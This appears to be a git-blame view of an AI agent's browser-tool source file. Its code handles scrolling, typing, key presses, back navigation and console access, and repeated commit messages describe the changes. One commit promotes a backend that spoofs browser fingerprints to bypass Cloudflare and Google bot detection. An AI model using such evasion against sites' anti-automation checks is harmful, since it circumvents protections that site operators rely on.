correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Ensure ref starts with @
if not ref . startswith ( " @ " ) :
ref = f " @ { ref } "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Use fill command (clears then types)
result = _run_browser_command ( effective_task_id , " fill " , [ ref , text ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
return json . dumps ( {
" success " : True ,
" typed " : text ,
" element " : ref
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , f " Failed to type into { ref } " )
} , ensure_ascii = False )
def browser_scroll ( direction : str , task_id : Optional [ str ] = None ) - > str :
"""
Scroll the page .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
direction : " up " or " down "
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with scroll result
"""
# Validate direction
if direction not in [ " up " , " down " ] :
return json . dumps ( {
" success " : False ,
" error " : f " Invalid direction ' { direction } ' . Use ' up ' or ' down ' . "
} , ensure_ascii = False )
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
# Single scroll with pixel amount instead of 5x subprocess calls.
# agent-browser supports: agent-browser scroll down 500
# ~500px is roughly half a viewport of travel.
_SCROLL_PIXELS = 500
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_scroll
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
# Camofox REST API doesn't support pixel args; use repeated calls
_SCROLL_REPEATS = 5
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
result = None
for _ in range ( _SCROLL_REPEATS ) :
result = camofox_scroll ( direction , task_id )
return result
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
result = _run_browser_command ( effective_task_id , " scroll " , [ direction , str ( _SCROLL_PIXELS ) ] )
if not result . get ( " success " ) :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , f " Failed to scroll { direction } " )
} , ensure_ascii = False )
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
return json . dumps ( {
" success " : True ,
" scrolled " : direction
} , ensure_ascii = False )
2026-01-29 06:10:24 +00:00
def browser_back ( task_id : Optional [ str ] = None ) - > str :
"""
Navigate back in browser history .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with navigation result
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_back
return camofox_back ( task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-01-29 06:10:24 +00:00
result = _run_browser_command ( effective_task_id , " back " , [ ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
data = result . get ( " data " , { } )
return json . dumps ( {
" success " : True ,
" url " : data . get ( " url " , " " )
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , " Failed to go back " )
} , ensure_ascii = False )
def browser_press ( key : str , task_id : Optional [ str ] = None ) - > str :
"""
Press a keyboard key .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
key : Key to press ( e . g . , " Enter " , " Tab " )
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with key press result
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_press
return camofox_press ( key , task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
effective_task_id = _last_session_key ( task_id or " default " )
2026-01-29 06:10:24 +00:00
result = _run_browser_command ( effective_task_id , " press " , [ key ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
return json . dumps ( {
" success " : True ,
" pressed " : key
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , f " Failed to press { key } " )
} , ensure_ascii = False )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
2026-01-29 06:10:24 +00:00
2026-04-05 12:42:52 -07:00
def browser_console ( clear : bool = False , expression : Optional [ str ] = None , task_id : Optional [ str ] = None ) - > str :
""" Get browser console messages and JavaScript errors, or evaluate JS in the page.
2026-03-14 11:34:31 -07:00
2026-04-05 12:42:52 -07:00
When ` ` expression ` ` is provided , evaluates JavaScript in the page context
( like the DevTools console ) and returns the result . Otherwise returns
console output ( log / warn / error / info ) and uncaught exceptions .
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
Args :
clear : If True , clear the message / error buffers after reading
2026-04-05 12:42:52 -07:00
expression : JavaScript expression to evaluate in the page context
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
